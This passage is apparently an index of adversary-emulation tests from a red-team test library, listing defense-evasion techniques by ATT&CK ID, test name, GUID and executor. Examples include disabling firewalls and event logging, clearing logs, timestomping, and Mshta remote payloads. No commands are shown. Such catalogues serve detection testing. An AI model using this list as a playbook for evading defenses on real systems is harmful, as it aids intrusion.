158 defense-evasion T1218 Signed Binary Proxy Execution 6 Renamed Microsoft.Workflow.Compiler.exe Payload Executions 4cc40fd7-87b8-4b16-b2d7-57534b86b911 powershell
159 defense-evasion T1218 Signed Binary Proxy Execution 7 Invoke-ATHRemoteFXvGPUDisablementCommand base test 9ebe7901-7edf-45c0-b5c7-8366300919db powershell
160 defense-evasion T1218 Signed Binary Proxy Execution 8 DiskShadow Command Execution 0e1483ba-8f0c-425d-b8c6-42736e058eaa powershell
161 defense-evasion T1218 Signed Binary Proxy Execution 9 Load Arbitrary DLL via Wuauclt (Windows Update Client) 49fbd548-49e9-4bb7-94a6-3769613912b8 command_prompt
162 defense-evasion T1218 Signed Binary Proxy Execution 10 Lolbin Gpscript logon option 5bcda9cd-8e85-48fa-861d-b5a85d91d48c command_prompt
163 defense-evasion T1218 Signed Binary Proxy Execution 11 Lolbin Gpscript startup option f8da74bb-21b8-4af9-8d84-f2c8e4a220e3 command_prompt
164 defense-evasion T1218 Signed Binary Proxy Execution 12 Lolbas ie4uinit.exe use as proxy 13c0804e-615e-43ad-b223-2dfbacd0b0b3 command_prompt
165 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 1 Set a file's access timestamp 5f9113d5-ed75-47ed-ba23-ea3573d05810 sh
166 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 2 Set a file's modification timestamp 20ef1523-8758-4898-b5a2-d026cc3d2c52 sh
167 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 3 Set a file's creation timestamp 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b sh
168 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 4 Modify file timestamps using reference file 631ea661-d661-44b0-abdb-7a7f3fc08e50 sh
169 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 5 Windows - Modify file creation timestamp with PowerShell b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c powershell
170 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 6 Windows - Modify file last modified timestamp with PowerShell f8f6634d-93e1-4238-8510-f8a90a20dcf2 powershell
171 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 7 Windows - Modify file last access timestamp with PowerShell da627f63-b9bd-4431-b6f8-c5b44d061a62 powershell
172 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 8 Windows - Timestomp a File d7512c33-3a75-4806-9893-69abc3ccdd43 powershell
173 defense-evasion T1620 Reflective Code Loading 1 WinPwn - Reflectively load Mimik@tz into memory 56b9589c-9170-4682-8c3d-33b86ecb5119 powershell
174 defense-evasion T1218.003 Signed Binary Proxy Execution: CMSTP 1 CMSTP Executing Remote Scriptlet 34e63321-9683-496b-bbc1-7566bc55e624 command_prompt
175 defense-evasion T1218.003 Signed Binary Proxy Execution: CMSTP 2 CMSTP Executing UAC Bypass 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 command_prompt
176 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 1 Disable Windows IIS HTTP Logging 69435dcf-c66f-4ec0-a8b1-82beb76b34db powershell
177 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 2 Disable Windows IIS HTTP Logging via PowerShell a957fb0f-1e85-49b2-a211-413366784b1e powershell
178 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 3 Kill Event Log Service Threads 41ac52ba-5d5e-40c0-b267-573ed90489bd powershell
179 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 4 Impair Windows Audit Log Policy 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 command_prompt
180 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 5 Clear Windows Audit Policy Config 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 command_prompt
181 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 6 Disable Event Logging with wevtutil b26a3340-dad7-4360-9176-706269c74103 command_prompt
182 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 7 Makes Eventlog blind with Phant0m 3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741 command_prompt
183 defense-evasion T1218.002 Signed Binary Proxy Execution: Control Panel 1 Control Panel Items 037e9d8a-9e46-4255-8b33-2ae3b545ca6f command_prompt
184 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 1 Disable Microsoft Defender Firewall 88d05800-a5e4-407e-9b53-ece4174f197f command_prompt
185 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 2 Disable Microsoft Defender Firewall via Registry afedc8c4-038c-4d82-b3e5-623a95f8a612 command_prompt
186 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 3 Allow SMB and RDP on Microsoft Defender Firewall d9841bf8-f161-4c73-81e9-fd773a5ff8c1 command_prompt
187 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 4 Opening ports for proxy - HARDRAIN 15e57006-79dd-46df-9bf9-31bc24fb5a80 command_prompt
188 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 5 Open a local port through Windows Firewall to any profile 9636dd6e-7599-40d2-8eee-ac16434f35ed powershell
189 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 6 Allow Executable Through Firewall Located in Non-Standard Location 6f5822d2-d38d-4f48-9bfc-916607ff6b8c powershell
190 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 7 Stop/Start UFW firewall fe135572-edcd-49a2-afe6-1d39521c5a9a sh
191 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 8 Stop/Start UFW firewall systemctl 9fd99609-1854-4f3c-b47b-97d9a5972bd1 sh
192 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 9 Turn off UFW logging 8a95b832-2c2a-494d-9cb0-dc9dd97c8bad sh
193 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 10 Add and delete UFW firewall rules b2563a4e-c4b8-429c-8d47-d5bcb227ba7a sh
194 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 11 Edit UFW firewall user.rules file beaf815a-c883-4194-97e9-fdbbb2bbdd7c sh
195 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 12 Edit UFW firewall ufw.conf file c1d8c4eb-88da-4927-ae97-c7c25893803b sh
196 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 13 Edit UFW firewall sysctl.conf file c4ae0701-88d3-4cd8-8bce-4801ed9f97e4 sh
197 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 14 Edit UFW firewall main configuration file 7b697ece-8270-46b5-bbc7-6b9e27081831 sh
198 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 15 Tail the UFW firewall log file 419cca0c-fa52-4572-b0d7-bc7c6f388a27 sh
199 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 16 Disable iptables 7784c64e-ed0b-4b65-bf63-c86db229fd56 sh
200 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 17 Modify/delete iptables firewall rules 899a7fb5-d197-4951-8614-f19ac4a73ad4 sh
201 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 18 LockBit Black - Unusual Windows firewall registry modification -cmd a4651931-ebbb-4cde-9363-ddf3d66214cb command_prompt
202 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 19 LockBit Black - Unusual Windows firewall registry modification -Powershell 80b453d1-eec5-4144-bf08-613a6c3ffe12 powershell
203 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 20 Blackbit - Disable Windows Firewall using netsh firewall 91f348e6-3760-4997-a93b-2ceee7f254ee command_prompt
204 defense-evasion T1207 Rogue Domain Controller 1 DCShadow (Active Directory) 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6 powershell
205 defense-evasion T1610 Deploy a container 1 Deploy Docker container 59aa6f26-7620-417e-9318-589e0fb7a372 bash
206 defense-evasion T1112 Modify Registry 1 Modify Registry of Current User Profile - cmd 1324796b-d0f6-455a-b4ae-21ffee6aa6b9 command_prompt
207 defense-evasion T1112 Modify Registry 2 Modify Registry of Local Machine - cmd 282f929a-6bc5-42b8-bd93-960c3ba35afe command_prompt
208 defense-evasion T1112 Modify Registry 3 Modify registry to store logon credentials c0413fb5-33e2-40b7-9b6f-60b29f4a7a18 command_prompt
209 defense-evasion T1112 Modify Registry 4 Add domain to Trusted sites Zone cf447677-5a4e-4937-a82c-e47d254afd57 powershell
210 defense-evasion T1112 Modify Registry 5 Javascript in registry 15f44ea9-4571-4837-be9e-802431a7bfae powershell
211 defense-evasion T1112 Modify Registry 6 Change Powershell Execution Policy to Bypass f3a6cceb-06c9-48e5-8df8-8867a6814245 powershell
212 defense-evasion T1112 Modify Registry 7 BlackByte Ransomware Registry Changes - CMD 4f4e2f9f-6209-4fcf-9b15-3b7455706f5b command_prompt
213 defense-evasion T1112 Modify Registry 8 BlackByte Ransomware Registry Changes - Powershell 0b79c06f-c788-44a2-8630-d69051f1123d powershell
214 defense-evasion T1112 Modify Registry 9 Disable Windows Registry Tool ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8 command_prompt
215 defense-evasion T1112 Modify Registry 10 Disable Windows CMD application d2561a6d-72bd-408c-b150-13efe1801c2a powershell
216 defense-evasion T1112 Modify Registry 11 Disable Windows Task Manager application af254e70-dd0e-4de6-9afe-a994d9ea8b62 command_prompt
217 defense-evasion T1112 Modify Registry 12 Disable Windows Notification Center c0d6d67f-1f63-42cc-95c0-5fd6b20082ad command_prompt
218 defense-evasion T1112 Modify Registry 13 Disable Windows Shutdown Button 6e0d1131-2d7e-4905-8ca5-d6172f05d03d command_prompt
219 defense-evasion T1112 Modify Registry 14 Disable Windows LogOff Button e246578a-c24d-46a7-9237-0213ff86fb0c command_prompt
220 defense-evasion T1112 Modify Registry 15 Disable Windows Change Password Feature d4a6da40-618f-454d-9a9e-26af552aaeb0 command_prompt
221 defense-evasion T1112 Modify Registry 16 Disable Windows Lock Workstation Feature 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56 command_prompt
222 defense-evasion T1112 Modify Registry 17 Activate Windows NoDesktop Group Policy Feature 93386d41-525c-4a1b-8235-134a628dee17 command_prompt
223 defense-evasion T1112 Modify Registry 18 Activate Windows NoRun Group Policy Feature d49ff3cc-8168-4123-b5b3-f057d9abbd55 command_prompt
224 defense-evasion T1112 Modify Registry 19 Activate Windows NoFind Group Policy Feature ffbb407e-7f1d-4c95-b22e-548169db1fbd command_prompt
225 defense-evasion T1112 Modify Registry 20 Activate Windows NoControlPanel Group Policy Feature a450e469-ba54-4de1-9deb-9023a6111690 command_prompt
226 defense-evasion T1112 Modify Registry 21 Activate Windows NoFileMenu Group Policy Feature 5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4 command_prompt
227 defense-evasion T1112 Modify Registry 22 Activate Windows NoClose Group Policy Feature 12f50e15-dbc6-478b-a801-a746e8ba1723 command_prompt
228 defense-evasion T1112 Modify Registry 23 Activate Windows NoSetTaskbar Group Policy Feature d29b7faf-7355-4036-9ed3-719bd17951ed command_prompt
229 defense-evasion T1112 Modify Registry 24 Activate Windows NoTrayContextMenu Group Policy Feature 4d72d4b1-fa7b-4374-b423-0fe326da49d2 command_prompt
230 defense-evasion T1112 Modify Registry 25 Activate Windows NoPropertiesMyDocuments Group Policy Feature 20fc9daa-bd48-4325-9aff-81b967a84b1d command_prompt
231 defense-evasion T1112 Modify Registry 26 Hide Windows Clock Group Policy Feature 8023db1e-ad06-4966-934b-b6a0ae52689e command_prompt
232 defense-evasion T1112 Modify Registry 27 Windows HideSCAHealth Group Policy Feature a4637291-40b1-4a96-8c82-b28f1d73e54e command_prompt
233 defense-evasion T1112 Modify Registry 28 Windows HideSCANetwork Group Policy Feature 3e757ce7-eca0-411a-9583-1c33b8508d52 command_prompt
234 defense-evasion T1112 Modify Registry 29 Windows HideSCAPower Group Policy Feature 8d85a5d8-702f-436f-bc78-fcd9119496fc command_prompt
235 defense-evasion T1112 Modify Registry 30 Windows HideSCAVolume Group Policy Feature 7f037590-b4c6-4f13-b3cc-e424c5ab8ade command_prompt
236 defense-evasion T1112 Modify Registry 31 Windows Modify Show Compress Color And Info Tip Registry 795d3248-0394-4d4d-8e86-4e8df2a2693f command_prompt
237 defense-evasion T1112 Modify Registry 32 Windows Powershell Logging Disabled 95b25212-91a7-42ff-9613-124aca6845a8 command_prompt
238 defense-evasion T1112 Modify Registry 33 Windows Add Registry Value to Load Service in Safe Mode without Network 1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5 command_prompt
239 defense-evasion T1112 Modify Registry 34 Windows Add Registry Value to Load Service in Safe Mode with Network c173c948-65e5-499c-afbe-433722ed5bd4 command_prompt
240 defense-evasion T1112 Modify Registry 35 Disable Windows Toast Notifications 003f466a-6010-4b15-803a-cbb478a314d7 command_prompt
241 defense-evasion T1112 Modify Registry 36 Disable Windows Security Center Notifications 45914594-8df6-4ea9-b3cc-7eb9321a807e command_prompt
242 defense-evasion T1112 Modify Registry 37 Suppress Win Defender Notifications c30dada3-7777-4590-b970-dc890b8cf113 command_prompt
243 defense-evasion T1112 Modify Registry 38 Allow RDP Remote Assistance Feature 86677d0e-0b5e-4a2b-b302-454175f9aa9e command_prompt
244 defense-evasion T1112 Modify Registry 39 NetWire RAT Registry Key Creation 65704cd4-6e36-4b90-b6c1-dc29a82c8e56 command_prompt
245 defense-evasion T1112 Modify Registry 40 Ursnif Malware Registry Key Creation c375558d-7c25-45e9-bd64-7b23a97c1db0 command_prompt
246 defense-evasion T1112 Modify Registry 41 Terminal Server Client Connection History Cleared 3448824b-3c35-4a9e-a8f5-f887f68bea21 command_prompt
247 defense-evasion T1112 Modify Registry 42 Disable Windows Error Reporting Settings d2c9e41e-cd86-473d-980d-b6403562e3e1 command_prompt
248 defense-evasion T1112 Modify Registry 43 DisallowRun Execution Of Certain Applications 71db768a-5a9c-4047-b5e7-59e01f188e84 command_prompt
249 defense-evasion T1112 Modify Registry 44 Enabling Restricted Admin Mode via Command_Prompt fe7974e5-5813-477b-a7bd-311d4f535e83 command_prompt
250 defense-evasion T1112 Modify Registry 45 Mimic Ransomware - Enable Multiple User Sessions 39f1f378-ba8a-42b3-96dc-2a6540cfc1e3 command_prompt
251 defense-evasion T1112 Modify Registry 46 Mimic Ransomware - Allow Multiple RDP Sessions per User 35727d9e-7a7f-4d0c-a259-dc3906d6e8b9 command_prompt
252 defense-evasion T1112 Modify Registry 47 Event Viewer Registry Modification - Redirection URL 6174be7f-5153-4afd-92c5-e0c3b7cdb5ae command_prompt
253 defense-evasion T1112 Modify Registry 48 Event Viewer Registry Modification - Redirection Program 81483501-b8a5-4225-8b32-52128e2f69db command_prompt
254 defense-evasion T1112 Modify Registry 49 Enabling Remote Desktop Protocol via Remote Registry e3ad8e83-3089-49ff-817f-e52f8c948090 command_prompt
255 defense-evasion T1112 Modify Registry 50 Disable Win Defender Notification 12e03af7-79f9-4f95-af48-d3f12f28a260 command_prompt
256 defense-evasion T1112 Modify Registry 51 Disable Windows OS Auto Update 01b20ca8-c7a3-4d86-af59-059f15ed5474 command_prompt
257 defense-evasion T1112 Modify Registry 52 Disable Windows Auto Reboot for current logon user 396f997b-c5f8-4a96-bb2c-3c8795cf459d command_prompt
258 defense-evasion T1112 Modify Registry 53 Windows Auto Update Option to Notify before download 335a6b15-b8d2-4a3f-a973-ad69aa2620d7 command_prompt
259 defense-evasion T1112 Modify Registry 54 Do Not Connect To Win Update d1de3767-99c2-4c6c-8c5a-4ba4586474c8 command_prompt
260 defense-evasion T1112 Modify Registry 55 Tamper Win Defender Protection 3b625eaa-c10d-4635-af96-3eae7d2a2f3c command_prompt
261 defense-evasion T1112 Modify Registry 56 Snake Malware Registry Blob 8318ad20-0488-4a64-98f4-72525a012f6b powershell
262 defense-evasion T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
263 defense-evasion T1027.001 Obfuscated Files or Information: Binary Padding 1 Pad Binary to Change Hash - Linux/macOS dd ffe2346c-abd5-4b45-a713-bf5f1ebd573a sh
264 defense-evasion T1027.001 Obfuscated Files or Information: Binary Padding 2 Pad Binary to Change Hash using truncate command - Linux/macOS e22a9e89-69c7-410f-a473-e6c212cd2292 sh
265 defense-evasion T1484.001 Domain Policy Modification: Group Policy Modification 1 LockBit Black - Modify Group policy settings -cmd 9ab80952-74ee-43da-a98c-1e740a985f28 command_prompt
266 defense-evasion T1484.001 Domain Policy Modification: Group Policy Modification 2 LockBit Black - Modify Group policy settings -Powershell b51eae65-5441-4789-b8e8-64783c26c1d1 powershell
267 defense-evasion T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
268 defense-evasion T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
269 defense-evasion T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 command_prompt
270 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
271 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
272 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 3 Dylib Injection via DYLD_INSERT_LIBRARIES 4d66029d-7355-43fd-93a4-b63ba92ea1be bash
273 defense-evasion T1070.001 Indicator Removal on Host: Clear Windows Event Logs 1 Clear Logs e6abb60e-26b8-41da-8aae-0c35174b0967 command_prompt
274 defense-evasion T1070.001 Indicator Removal on Host: Clear Windows Event Logs 2 Delete System Logs Using Clear-EventLog b13e9306-3351-4b4b-a6e8-477358b0b498 powershell
275 defense-evasion T1070.001 Indicator Removal on Host: Clear Windows Event Logs 3 Clear Event Logs via VBA 1b682d84-f075-4f93-9a89-8a8de19ffd6e powershell
276 defense-evasion T1134.002 Create Process with Token 1 Access Token Manipulation dbf4f5a9-b8e0-46a3-9841-9ad71247239e powershell
277 defense-evasion T1134.002 Create Process with Token 2 WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique ccf4ac39-ec93-42be-9035-90e2f26bcd92 powershell
278 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
279 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
280 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
281 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 4 Make and modify capabilities of a binary db53959c-207d-4000-9e7a-cd8eb417e072 sh
282 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 5 Provide the SetUID capability to a file 1ac3272f-9bcf-443a-9888-4b1d3de785c1 sh
283 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 6 Do reconnaissance for files that have the setuid bit set 8e36da01-cd29-45fd-be72-8a0fcaad4481 sh
284 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 7 Do reconnaissance for files that have the setgid bit set 3fb46e17-f337-4c14-9f9a-a471946533e2 sh
285 defense-evasion T1218.008 Signed Binary Proxy Execution: Odbcconf 1 Odbcconf.exe - Execute Arbitrary DLL 2430498b-06c0-4b92-a448-8ad263c388e2 command_prompt
286 defense-evasion T1218.008 Signed Binary Proxy Execution: Odbcconf 2 Odbcconf.exe - Load Response File 331ce274-f9c9-440b-9f8c-a1006e1fce0b command_prompt
287 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 1 Auditing Configuration Changes on Linux Host 212cfbcf-4770-4980-bc21-303e37abd0e3 bash
288 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 2 Logging Configuration Changes on Linux Host 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c bash
289 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 3 Disable Powershell ETW Provider - Windows 6f118276-121d-4c09-bb58-a8fb4a72ee84 powershell
290 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 4 Disable .NET Event Tracing for Windows Via Registry (cmd) 8a4c33be-a0d3-434a-bee6-315405edbd5b command_prompt
291 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 5 Disable .NET Event Tracing for Windows Via Registry (powershell) 19c07a45-452d-4620-90ed-4c34fffbe758 powershell
292 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 6 LockBit Black - Disable the ETW Provider of Windows Defender -cmd f6df0b8e-2c83-44c7-ba5e-0fa4386bec41 command_prompt
293 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 7 LockBit Black - Disable the ETW Provider of Windows Defender -Powershell 69fc085b-5444-4879-8002-b24c8e1a3e02 powershell
294 defense-evasion T1070 Indicator Removal on Host 1 Indicator Removal using FSUtil b4115c7a-0e92-47f0-a61e-17e7218b2435 command_prompt
295 defense-evasion T1550.003 Use Alternate Authentication Material: Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
296 defense-evasion T1550.003 Use Alternate Authentication Material: Pass the Ticket 2 Rubeus Kerberos Pass The Ticket a2fc4ec5-12c6-4fb4-b661-961f23f359cb powershell
297 defense-evasion T1036.004 Masquerading: Masquerade Task or Service 1 Creating W32Time similar named service using schtasks f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9 command_prompt
298 defense-evasion T1036.004 Masquerading: Masquerade Task or Service 2 Creating W32Time similar named service using sc b721c6ef-472c-4263-a0d9-37f1f4ecff66 command_prompt
299 defense-evasion T1036.004 Masquerading: Masquerade Task or Service 3 linux rename /proc/pid/comm using prctl f0e3aaea-5cd9-4db6-a077-631dd19b27a8 sh
300 defense-evasion T1055.004 Process Injection: Asynchronous Procedure Call 1 Process Injection via C# 611b39b7-e243-4c81-87a4-7145a90358b1 command_prompt
301 defense-evasion T1647 Plist File Modification 1 Plist Modification 394a538e-09bb-4a4a-95d1-b93cf12682a8 manual
302 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 1 Mount ISO image 002cca30-4778-4891-878a-aaffcfa502fa powershell
303 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 2 Mount an ISO image and run executable from the ISO 42f22b00-0242-4afc-a61b-0da05041f9cc powershell
304 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 3 Remove the Zone.Identifier alternate data stream 64b12afc-18b8-4d3f-9eab-7f6cae7c73f9 powershell
305 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 4 Execute LNK file from ISO c2587b8d-743d-4985-aa50-c83394eaeb68 powershell
306 defense-evasion T1612 Build Image on Host 1 Build Image On Host 2db30061-589d-409b-b125-7b473944f9b3 sh
307 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 1 Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject 1483fab9-4f52-4217-a9ce-daa9d7747cae command_prompt
308 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 2 Mshta executes VBScript to execute malicious command 906865c3-e05f-4acc-85c4-fbc185455095 command_prompt
309 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 3 Mshta Executes Remote HTML Application (HTA) c4b97eeb-5249-4455-a607-59f95485cb45 powershell
310 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 4 Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement 007e5672-2088-4853-a562-7490ddc19447 powershell
311 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 5 Invoke HTML Application - Jscript Engine Simulating Double Click 58a193ec-131b-404e-b1ca-b35cf0b18c33 powershell
312 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 6 Invoke HTML Application - Direct download from URI 39ceed55-f653-48ac-bd19-aceceaf525db powershell
313 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 7 Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler e7e3a525-7612-4d68-a5d3-c4649181b8af powershell
314 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 8 Invoke HTML Application - JScript Engine with Inline Protocol Handler d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 powershell
315 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 9 Invoke HTML Application - Simulate Lateral Movement over UNC Path b8a8bdb2-7eae-490d-8251-d5e0295b2362 powershell
316 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 10 Mshta used to Execute PowerShell 8707a805-2b76-4f32-b1c0-14e558205772 command_prompt
317 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 1 Named pipe client impersonation 90db9e27-8e7c-4c04-b602-a45927884966 powershell
318 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 2 `SeDebugPrivilege` token duplication 34f0a430-9d04-4d98-bcb5-1989f14719f0 powershell
319 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 3 Launch NSudo Executable 7be1bc0f-d8e5-4345-9333-f5f67d742cb9 powershell
320 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 4 Bad Potato 9c6d799b-c111-4749-a42f-ec2f8cb51448 powershell
321 defense-evasion T1564.002 Hide Artifacts: Hidden Users 1 Create Hidden User using UniqueID < 500 4238a7f0-a980-4fff-98a2-dfc0a363d507 sh
322 defense-evasion T1564.002 Hide Artifacts: Hidden Users 2 Create Hidden User using IsHidden option de87ed7b-52c3-43fd-9554-730f695e7f31 sh
323 defense-evasion T1564.002 Hide Artifacts: Hidden Users 3 Create Hidden User in Registry 173126b7-afe4-45eb-8680-fa9f6400431c command_prompt
324 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 1 Disable history collection 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 sh
325 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 2 Mac HISTCONTROL 468566d5-83e5-40c1-b338-511e1659628d manual
326 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 3 Clear bash history 878794f7-c511-4199-a950-8c28b3ed8e5b bash
327 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 4 Setting the HISTCONTROL environment variable 10ab786a-028e-4465-96f6-9e83ca6c5f24 bash
328 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 5 Setting the HISTFILESIZE environment variable 5cafd6c1-2f43-46eb-ac47-a5301ba0a618 bash
329 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 6 Setting the HISTFILE environment variable b3dacb6c-a9e3-44ec-bf87-38db60c5cad1 bash
330 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 7 Setting the HISTIGNORE environment variable f12acddb-7502-4ce6-a146-5b62c59592f1 bash
331 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 1 Parent PID Spoofing using PowerShell 069258f4-2162-46e9-9a25-c9c6c56150d2 powershell
332 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 2 Parent PID Spoofing - Spawn from Current Process 14920ebd-1d61-491a-85e0-fe98efe37f25 powershell
333 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 3 Parent PID Spoofing - Spawn from Specified Process cbbff285-9051-444a-9d17-c07cd2d230eb powershell
334 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 4 Parent PID Spoofing - Spawn from svchost.exe e9f2b777-3123-430b-805d-5cedc66ab591 powershell
335 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 5 Parent PID Spoofing - Spawn from New Process 2988133e-561c-4e42-a15f-6281e6a9b2db powershell
336 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 1 Compiled HTML Help Local Payload 5cb87818-0d7c-4469-b7ef-9224107aebe8 command_prompt
337 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 2 Compiled HTML Help Remote Payload 0f8af516-9818-4172-922b-42986ef1e81d command_prompt
338 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 3 Invoke CHM with default Shortcut Command Execution 29d6f0d7-be63-4482-8827-ea77126c1ef7 powershell
339 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 4 Invoke CHM with InfoTech Storage Protocol Handler b4094750-5fc7-4e8e-af12-b4e36bf5e7f6 powershell
340 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 5 Invoke CHM Simulate Double click 5decef42-92b8-4a93-9eb2-877ddcb9401a powershell
341 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 6 Invoke CHM with Script Engine and Help Topic 4f83adda-f5ec-406d-b318-9773c9ca92e5 powershell
342 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 7 Invoke CHM Shortcut Command with ITS and Help Topic 15756147-7470-4a83-87fb-bb5662526247 powershell
343 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 8 Decompile Local CHM File 20cb05e0-1fa5-406d-92c1-84da4ba01813 command_prompt
344 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 1 Add Network Share 14c38f32-6509-46d8-ab43-d53e32d2b131 command_prompt
345 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 2 Remove Network Share 09210ad5-1ef2-4077-9ad3-7351e13e9222 command_prompt
